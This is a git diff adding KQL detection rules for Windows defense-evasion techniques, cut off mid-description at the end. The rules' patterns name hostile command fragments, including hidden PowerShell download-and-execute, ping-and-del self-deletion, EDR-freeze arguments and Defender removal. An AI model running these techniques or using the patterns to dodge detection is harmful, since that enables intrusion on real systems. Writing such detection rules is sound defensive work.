Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceProcessEvents +| where (ProcessCommandLine contains "ping" and ProcessCommandLine contains "del ") and (ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f " or ProcessCommandLine contains " -q " or ProcessCommandLine contains " /q " or ProcessCommandLine contains " –q " or ProcessCommandLine contains " —q " or ProcessCommandLine contains " ―q ") and ProcessCommandLine contains "Nul" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql b/KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql new file mode 100644 index 00000000..510eb368 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Powercfg Execution To Change Lock Screen Timeout +// Author: frack113 +// Date: 2022-11-18 +// Level: medium +// Description: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where (FolderPath endswith "\\powercfg.exe" or ProcessVersionInfoOriginalFileName =~ "PowerCfg.exe") and ((ProcessCommandLine contains "/setacvalueindex " and ProcessCommandLine contains "SCHEME_CURRENT" and ProcessCommandLine contains "SUB_VIDEO" and ProcessCommandLine contains "VIDEOCONLOCK") or (ProcessCommandLine contains "-change " and ProcessCommandLine contains "-standby-timeout-")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql b/KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql new file mode 100644 index 00000000..17892898 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql @@ -0,0 +1,10 @@ +// Title: Suspicious PowerShell Invocations - Specific - ProcessCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-05 +// Level: medium +// Description: Detects suspicious PowerShell invocation command parameters +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "[Convert]::FromBase64String") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-ep" and ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-Enc") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-noni" and ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object") or (ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object" and ProcessCommandLine contains "Net.WebClient" and ProcessCommandLine contains ".Download") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "\\software\\") or (ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-noprofile" and ProcessCommandLine contains "-windowstyle" and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "new-object" and ProcessCommandLine contains "system.net.webclient" and ProcessCommandLine contains ".download")) and (not((ProcessCommandLine contains "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1" or ProcessCommandLine contains "Write-ChocolateyWarning"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql b/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql new file mode 100644 index 00000000..ce814bbd --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql @@ -0,0 +1,14 @@ +// Title: Suspicious Process Masquerading As SvcHost.EXE +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-08-07 +// Level: high +// Description: Detects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location. +Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\svchost.exe" and (not(((FolderPath in~ ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe")) or ProcessVersionInfoOriginalFileName =~ "svchost.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_process_parents.kql b/KQL/rules/Defense Evasion/suspicious_process_parents.kql new file mode 100644 index 00000000..1eca60d2 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_process_parents.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Process Parents +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-21 +// Level: high +// Description: Detects suspicious parent processes that should not have any children or should only have a single possible child program +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where (InitiatingProcessFolderPath endswith "\\minesweeper.exe" or InitiatingProcessFolderPath endswith "\\winver.exe" or InitiatingProcessFolderPath endswith "\\bitsadmin.exe") or ((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\eventvwr.exe" or InitiatingProcessFolderPath endswith "\\calc.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe") and (not((isnull(FolderPath) or (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\mmc.exe" or FolderPath endswith "\\win32calc.exe" or FolderPath endswith "\\notepad.exe"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_process_start_locations.kql b/KQL/rules/Defense Evasion/suspicious_process_start_locations.kql new file mode 100644 index 00000000..22adc778 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_process_start_locations.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Process Start Locations +// Author: juju4, Jonhnathan Ribeiro, oscd.community +// Date: 2019-01-16 +// Level: medium +// Description: Detects suspicious process run from unusual locations +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, car.2013-05-002 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents +| where (FolderPath contains ":\\RECYCLER\\" or FolderPath contains ":\\SystemVolumeInformation\\") or (FolderPath startswith "C:\\Windows\\Tasks\\" or FolderPath startswith "C:\\Windows\\debug\\" or FolderPath startswith "C:\\Windows\\fonts\\" or FolderPath startswith "C:\\Windows\\help\\" or FolderPath startswith "C:\\Windows\\drivers\\" or FolderPath startswith "C:\\Windows\\addins\\" or FolderPath startswith "C:\\Windows\\cursors\\" or FolderPath startswith "C:\\Windows\\system32\\tasks\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql b/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql new file mode 100644 index 00000000..0007595c --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Process Suspension via WERFaultSecure through EDR-Freeze +// Author: Jason (https://github.com/0xbcf) +// Date: 2025-09-23 +// Level: high +// Description: Detects attempts to freeze a process likely an EDR or an antimalware service process through EDR-Freeze that abuses the WerFaultSecure.exe process to suspend security software. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate usage of WerFaultSecure for debugging purposes + +DeviceProcessEvents +| where (ProcessCommandLine contains " /h " and ProcessCommandLine contains " /pid " and ProcessCommandLine contains " /tid " and ProcessCommandLine contains " /encfile " and ProcessCommandLine contains " /cancel " and ProcessCommandLine contains " /type " and ProcessCommandLine contains " 268310") and (FolderPath endswith "\\WerFaultSecure.exe" or ProcessVersionInfoOriginalFileName =~ "WerFaultSecure.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql b/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql new file mode 100644 index 00000000..b0422cb6 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql @@ -0,0 +1,14 @@ +// Title: Suspicious PROCEXP152.sys File Created In TMP +// Author: xknow (@xknow_infosec), xorxes (@xor_xes) +// Date: 2019-04-08 +// Level: medium +// Description: Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. +This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU. + +// MITRE Tactic: Defense Evasion +// Tags: attack.t1562.001, attack.defense-evasion +// False Positives: +// - Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it. + +DeviceFileEvents +| where (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "PROCEXP152.sys") and (not((InitiatingProcessFolderPath contains "\\procexp64.exe" or InitiatingProcessFolderPath contains "\\procexp.exe" or InitiatingProcessFolderPath contains "\\procmon64.exe" or InitiatingProcessFolderPath contains "\\procmon.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql b/KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql new file mode 100644 index 00000000..44f055b4 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE +// Author: Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +// Date: 2020-05-25 +// Level: high +// Description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "allowedprogram") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "action=allow" and ProcessCommandLine contains "program=")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and (ProcessCommandLine contains ":\\$Recycle.bin\\" or ProcessCommandLine contains ":\\RECYCLER.BIN\\" or ProcessCommandLine contains ":\\RECYCLERS.BIN\\" or ProcessCommandLine contains ":\\SystemVolumeInformation\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Default\\" or ProcessCommandLine contains ":\\Users\\Desktop\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\addins\\" or ProcessCommandLine contains ":\\Windows\\cursors\\" or ProcessCommandLine contains ":\\Windows\\debug\\" or ProcessCommandLine contains ":\\Windows\\drivers\\" or ProcessCommandLine contains ":\\Windows\\fonts\\" or ProcessCommandLine contains ":\\Windows\\help\\" or ProcessCommandLine contains ":\\Windows\\system32\\tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Local Settings\\Temporary Internet Files\\" or ProcessCommandLine contains "\\Temporary Internet Files\\Content.Outlook\\" or ProcessCommandLine contains "%Public%\\" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql b/KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql new file mode 100644 index 00000000..e564fb1c --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Provlaunch.EXE Child Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-08 +// Level: high +// Description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\")) and InitiatingProcessFolderPath endswith "\\provlaunch.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql b/KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql new file mode 100644 index 00000000..c2b341e2 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql @@ -0,0 +1,12 @@ +// Title: Suspicious RASdial Activity +// Author: juju4 +// Date: 2019-01-16 +// Level: medium +// Description: Detects suspicious process related to rasdial.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents +| where FolderPath endswith "rasdial.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql b/KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql new file mode 100644 index 00000000..7a9488ad --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Recursive Takeown +// Author: frack113 +// Date: 2022-01-30 +// Level: medium +// Description: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1222.001 +// False Positives: +// - Scripts created by developers and admins +// - Administrative activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "/f " and ProcessCommandLine contains "/r") and FolderPath endswith "\\takeown.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql b/KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql new file mode 100644 index 00000000..06baeb9e --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Regsvr32 Execution From Remote Share +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-31 +// Level: high +// Description: Detects REGSVR32.exe to execute DLL hosted on remote shares +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 + +DeviceProcessEvents +| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "\\REGSVR32.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql new file mode 100644 index 00000000..32519eac --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Response File Execution Via Odbcconf.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-22 +// Level: high +// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not((ProcessCommandLine contains ".rsp" or (ProcessCommandLine contains ".exe /E /F \"C:\\WINDOWS\\system32\\odbcconf.tmp\"" and FolderPath =~ "C:\\Windows\\System32\\odbcconf.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\runonce.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql b/KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql new file mode 100644 index 00000000..aff33994 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Rundll32 Activity Invoking Sys File +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-05 +// Level: high +// Description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents +| where ProcessCommandLine contains "rundll32.exe" and (ProcessCommandLine contains ".sys," or ProcessCommandLine contains ".sys ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql b/KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql new file mode 100644 index 00000000..e45820a0 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Rundll32 Execution With Image Extension +// Author: Hieu Tran +// Date: 2023-03-13 +// Level: high +// Description: Detects the execution of Rundll32.exe with DLL files masquerading as image files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents +| where (ProcessCommandLine contains ".bmp" or ProcessCommandLine contains ".cr2" or ProcessCommandLine contains ".eps" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".ico" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".nef" or ProcessCommandLine contains ".orf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".raw" or ProcessCommandLine contains ".sr2" or ProcessCommandLine contains ".tif" or ProcessCommandLine contains ".tiff") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql b/KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql new file mode 100644 index 00000000..880bdc77 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Rundll32 Setupapi.dll Activity +// Author: Konstantin Grishchenko, oscd.community +// Date: 2020-10-07 +// Level: medium +// Description: setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 +// False Positives: +// - Scripts and administrative tools that use INF files for driver installation with setupapi.dll + +DeviceProcessEvents +| where FolderPath endswith "\\runonce.exe" and (InitiatingProcessCommandLine contains "setupapi.dll" and InitiatingProcessCommandLine contains "InstallHinfSection") and InitiatingProcessFolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql b/KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql new file mode 100644 index 00000000..03b9b02d --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Service Binary Directory +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-09 +// Level: high +// Description: Detects a service binary running in a suspicious directory +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceProcessEvents +| where (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\$Recycle.bin" or FolderPath contains "\\Users\\All Users\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\Contacts\\" or FolderPath contains "\\Users\\Searches\\" or FolderPath contains "C:\\Perflogs\\" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\IME\\" or FolderPath contains "\\Windows\\addins\\") and (InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_service_installed.kql b/KQL/rules/Defense Evasion/suspicious_service_installed.kql new file mode 100644 index 00000000..439ddb56 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_service_installed.kql @@ -0,0 +1,14 @@ +// Title: Suspicious Service Installed +// Author: xknow (@xknow_infosec), xorxes (@xor_xes) +// Date: 2019-04-08 +// Level: medium +// Description: Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. +Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU) + +// MITRE Tactic: Defense Evasion +// Tags: attack.t1562.001, attack.defense-evasion +// False Positives: +// - Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it. + +DeviceRegistryEvents +| where (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\NalDrv\\ImagePath", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\PROCEXP152\\ImagePath")) and (not((RegistryValueData contains "\\WINDOWS\\system32\\Drivers\\PROCEXP152.SYS" and (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe" or InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql b/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql new file mode 100644 index 00000000..d1ea84e1 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql @@ -0,0 +1,12 @@ +// Title: Suspicious ShellExec_RunDLL Call Via Ordinal +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-12-01 +// Level: high +// Description: Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands. +Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents +| where (InitiatingProcessCommandLine contains "SHELL32.DLL" and (InitiatingProcessCommandLine contains "#568" or InitiatingProcessCommandLine contains "#570" or InitiatingProcessCommandLine contains "#572" or InitiatingProcessCommandLine contains "#576")) and ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "comspec" or InitiatingProcessCommandLine contains "iex" or InitiatingProcessCommandLine contains "Invoke-" or InitiatingProcessCommandLine contains "msiexec" or InitiatingProcessCommandLine contains "odbcconf" or InitiatingProcessCommandLine contains "regsvr32") or (InitiatingProcessCommandLine contains "\\Desktop\\" or InitiatingProcessCommandLine contains "\\ProgramData\\" or InitiatingProcessCommandLine contains "\\Temp\\" or InitiatingProcessCommandLine contains "\\Users\\Public\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql b/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql new file mode 100644 index 00000000..56279558 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql @@ -0,0 +1,14 @@ +// Title: Suspicious Speech Runtime Binary Child Process +// Author: andrewdanis +// Date: 2025-10-23 +// Level: high +// Description: Detects suspicious Speech Runtime Binary Execution by monitoring its child processes. +Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.lateral-movement, attack.t1021.003, attack.t1218 +// False Positives: +// - Unlikely. + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\SpeechRuntime.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql b/KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql new file mode 100644 index 00000000..1050b6ad --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Splwow64 Without Params +// Author: Florian Roth (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects suspicious Splwow64.exe process without any command line parameters +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceProcessEvents +| where ProcessCommandLine endswith "splwow64.exe" and FolderPath endswith "\\splwow64.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql b/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql new file mode 100644 index 00000000..75d606c8 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql @@ -0,0 +1,11 @@ +// Title: Suspicious Uninstall of Windows Defender Feature via PowerShell +// Author: yxinmiracle +// Date: 2025-08-22 +// Level: high +// Description: Detects the use of PowerShell with Uninstall-WindowsFeature or Remove-WindowsFeature cmdlets to disable or remove the Windows Defender GUI feature, a common technique used by adversaries to evade defenses. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents +| where ProcessCommandLine contains "Windows-Defender" and (ProcessCommandLine contains "Uninstall-WindowsFeature" or ProcessCommandLine contains "Remove-WindowsFeature") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql b/KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql new file mode 100644 index 00000000..8ef21a2e --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Usage Of ShellExec_RunDLL +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-01 +// Level: high +// Description: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ProcessCommandLine contains "ShellExec_RunDLL" and (ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "comspec" or ProcessCommandLine contains "iex" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "odbcconf" or ProcessCommandLine contains "regsvr32") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql new file mode 100644 index 00000000..a7a9987a --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Volume Shadow Copy VSS_PS.dll Load +// Author: Markus Neis, @markus_neis +// Date: 2021-07-07 +// Level: high +// Description: Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes. +It is often abused by attackers to delete or manipulate shadow copies, which can hinder forensic investigations and data recovery efforts. +The fact that it is loaded by processes that are not typically associated with VSS operations can 